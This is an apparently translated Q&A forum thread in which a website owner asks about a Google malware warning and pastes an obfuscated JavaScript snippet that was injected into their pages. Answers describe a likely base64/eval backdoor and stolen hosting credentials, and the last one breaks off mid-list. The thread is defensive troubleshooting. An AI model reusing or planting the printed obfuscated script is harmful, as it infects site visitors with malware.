昨天当我来到我的某个网站时,我收到谷歌的警告,我的网站上有恶意软件。我查看了代码,确实有些javascript不应该存在。我用谷歌搜索它并没有找到任何有用的东西。当我回到我的网站时,该代码消失了,但谷歌(当从搜索引擎访问该网站时)和谷歌浏览器仍然给我一个警告,我的网站上有恶意软件。
我查看了网站站长工具,他们发现几个页面存在问题。其中一个是http://www.keramikfliesen.com/schweiz/rimini/。恶意软件下网站管理员工具中列出的代码是:
<script type='text/javascript'>st="no3nen0orno3pno3rxstxpno3
rxnl";Date&&(a=["a#%d]%b@%e_%c)%1<%5*%4+%9:%3^%2","%7!%0|%f~
%8?%6&"]);var b=[],c="&!^<^]$$&)&~&_&)!:$$^@$|&:&&$?$]^<^]^]
&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*$_&:&_&+&*!?+~&&$?&!^<$:$:!@!?
^+^]^!^$+*^&^@!&&<!$$|&^^]&_&*!!$|++&<!+&*^@&^$_!^&*!+*+&:&]
&*$?&^$_&!&*!+*+&:&]&*$?$:$:^@&*&+^]&_&*!!$|++&<!+&*$?&^$_&!
&*!+*+&:&]&*$?$:$@!?^+$:^@&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*^]&!
^<$@$$^]$$$@&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$:
$@$$^@&*!?!|&:!$&*!^^]$$$@&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$@
$$^@!|&<!+&?^]$~$$^@&!^^^]$$&?!+!+!|^#$~$~$$$@!^!+$_!$&*!|&)
&<&^&*$?$~&*&_^|$~&!$)$$&!$$$:$_!$&*!|&)&<&^&*$?$~&_&~^^$~&!
$)$$&*$$$:$_!$&*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$$$_$$$:$@$$$~!+
&~!|^$$_&?!+&]&)$$^@!&&<!$$|&+^]$]^<$<^]&_&<!&&:&!&<!+&~!$$_
!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&:&_&+&*!?+~
&&$?$$&&&:!$&*&&&~!?$$$:$)&*^]$$^<$$$)&?^]&&!*&_&^!+&:&~&_$?
$:!@!]^@&?$_!|!$&~!+&~!+!:!|&*^]!@&$^#&&!*&_&^!+&:&~&_$?$:!@
!$&*!+!*!$&_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!@!&&<!$$|&&^]
&+&~
非常感谢你们的帮助!
答案 0 :(得分:2)
答案 1 :(得分:1)
如果代码再次出现,则攻击者会留下一些脚本,根据请求,该脚本会运行感染过程。通常,此脚本接收恶意代码的编码字符串(例如,在base64中),对其进行解码并通过eval()执行。您应该找到此文件(很可能是PHP脚本)并将其删除。要查找日志并搜索可疑请求(例如单个POST请求,发送base64字符串是一个非常可疑的请求)。
答案 2 :(得分:0)
很可能您的托管已被自动化工具泄露(密码被盗)。 此工具通常会在js文件中注入一些javascript,以便感染使用恶意软件访问您网页的人。你应该: